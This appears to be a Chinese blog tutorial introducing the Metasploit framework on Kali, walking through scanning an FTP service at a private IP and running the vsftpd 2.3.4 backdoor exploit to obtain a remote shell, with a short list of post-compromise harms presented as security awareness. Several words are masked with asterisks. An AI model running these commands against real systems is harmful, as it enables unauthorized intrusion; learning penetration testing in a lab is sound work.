点击"仙网攻城狮”关注我们哦~
简介
Metasploit***测试框架在kali系统中可以直接使用,不需要去搭建繁杂的各种环境。
kali系统安装方法查看:
***利器--最新版kali2020系统安装(超详细)Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施***。它本身附带数百个已知软件漏洞的专业级漏洞***工具
实战
运行Metasploit
2.输入show +模块名查看各个模块
辅助模块(auxiliary)扫描、发掘漏洞、探测信息等工作******模块(exploits)利用已发现的漏洞对远程目标系统进行***,植入并运行***载荷,从而控制目标系统***载荷模块(payloads)在******触发漏洞后劫持程序执行流程并跳入的这段代码。本模块的作用是消除安全工作人员开发这部分代码的代价空指令模块(nops)为了避免***载荷在执行的过程中出现随机地址和返回地址错误而在执行shellcode之前加入一些空指令,使得在执行shellcode时有一个较大的安全着陆区。编码器模块(encoders)将***载荷进行编码(类似与加密),让避免操作系统和杀毒软件辨认出来但是会让载荷的体积变大,这个时候需要选择传输器和传输体配对成的***载荷来下载目标载荷并且运行。后******模块(post)先拿下一个无关紧要的目标(A)来***真正的目标(B),A来执行真正的******。
3.例如我想看ftp是什么版本,使用use auxiliary/scanner/ftp/ftp_version切换辅助模块进行扫描来查看ftp服务版本。
set rhosts 192.168.88.45
--配置目标ip地址也可以配置域名
set rport 21
--配置目标端口run
--运行扫描
图中可以看到ftp服务版本vsFTPd 2.3.4
4.使用search vsFTPd 2.3.4来进行搜索当前版本是否有相关漏洞,图中可以看到匹配到了一个相关漏洞并列出了一个exp(漏洞利用模块)
5.切换到exp漏洞利用模块进行***,
use exploit/unix/ftp/vsftpd_234_backdoor
--切换到***模块
set rhosts 192.168.88.45
--配置目标
run
--运行******目标
上图可以看到已经建立了交互式shell可以执行任意命令,***成功后你的服务器就相当于归我了嘿嘿!--想干啥干啥。
6.***成功后可以做什么?
在几年前大家安全意识薄弱的时候并没有太在意网络安全,给大家普及一下安全知识,你的电脑被***后骇客可以做什么。
A.植入***程序,你在网上转账时记录你的用户名密码,进行网络盗窃
B.植入挖矿程序,耗完你电脑CPU和GPU进行挖矿,造成电脑卡顿无法上网等。
C.植入病毒程序,造成电脑蓝屏、无法使用等。
D.植入勒索软件,加密你的工作资料并向你索要赎金。
往期内容
更多资讯长按二维码 关注我们
专业的信息安全团队,给你最安全的保障。定期推送***知识和网络安全知识文章,让各位了解***的世界,学习***知识,普及安全知识,提高安全意识。
觉得不错点个“赞”呗